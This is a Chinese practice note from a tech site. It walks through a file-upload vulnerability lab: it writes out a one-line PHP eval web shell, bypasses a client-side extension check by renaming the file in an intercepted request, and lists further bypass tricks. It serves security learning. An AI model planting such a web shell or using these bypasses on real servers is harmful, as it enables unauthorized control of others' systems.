溫馨提示×

溫馨提示×

您好，登錄后才能下訂單哦！

密碼登錄×

忘記密碼？

登錄注冊×

獲取短信驗證碼

其他方式登錄

點擊登錄注冊即表示同意《億速云用戶服務條款》

用戶登錄×

賬戶密碼登錄

請使用微信掃描上方二維碼

使用幫助

請求超時！

請點擊重新獲取二維碼

文件上傳漏洞練習筆記（1）

發布時間：2020-05-24 15:02:20 來源：網絡閱讀：2413 作者：Alyoyojie 欄目：安全技術

（1）打開網站
文件上傳漏洞練習筆記（1）
（2）我們注意到一個圖片上傳，先傳個jpg看看

（3）結果中可以看到Stored in: upload/Tulips.jpg
先記一下，這個是文件的保存路徑，后邊會用到。
下邊開始看看傳其他文件，php，或隨便一個后綴名文件，探究他的過濾能力
我寫了個php文件為1text.php

<?php @eval($_POST['c']);?>

文件上傳漏洞練習筆記（1）

（4）我們發現不能上傳文件，可是又抓包抓不到，可以判定，在本地做了文件過濾
這時候，我們可以看看源代碼，發現有后綴名的校驗

文件上傳漏洞練習筆記（1）

（5）我們現在把1test.php改為1test.jpg

文件上傳漏洞練習筆記（1）

(6)可以發現文件是可以上傳成功的。
文件上傳漏洞練習筆記（1）

（7）但顯然，這個也不是我們要的結果，jpg格式不能直接解析
這個時候，我們想想是不是可以在上傳的時候將文件名改回php

文件上傳漏洞練習筆記（1）

（8）居然成功了，，我們菜刀連一下，。。網速太渣，就這樣把

文件上傳漏洞練習筆記（1）

(9)下邊提升下難度，如果上傳不成功，

 使用大小寫測試，或加 1 2 3 4 5 等，再或者嘗試pht文件

向AI問一下細節

推薦閱讀：

免責聲明：本站發布的內容（圖片、視頻和文字）以原創、轉載和分享為主，文章觀點不代表本網站立場，如果涉及侵權請聯系站長郵箱：is@yisu.com進行舉報，并提供相關證據，一經查實，將立刻刪除涉嫌侵權內容。

上一篇新聞：
DNS域名解析服務
下一篇新聞：
安裝FOG Server

猜你喜歡

AI
助
手

產品服務

地區劃分

專題活動

幫助支持

關于我們

售后咨詢

7*24小時在線電話：400-100-2938

7*24小時在線 QQ：800811969

關注億速云

億速云公眾號

手機網站二維碼

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女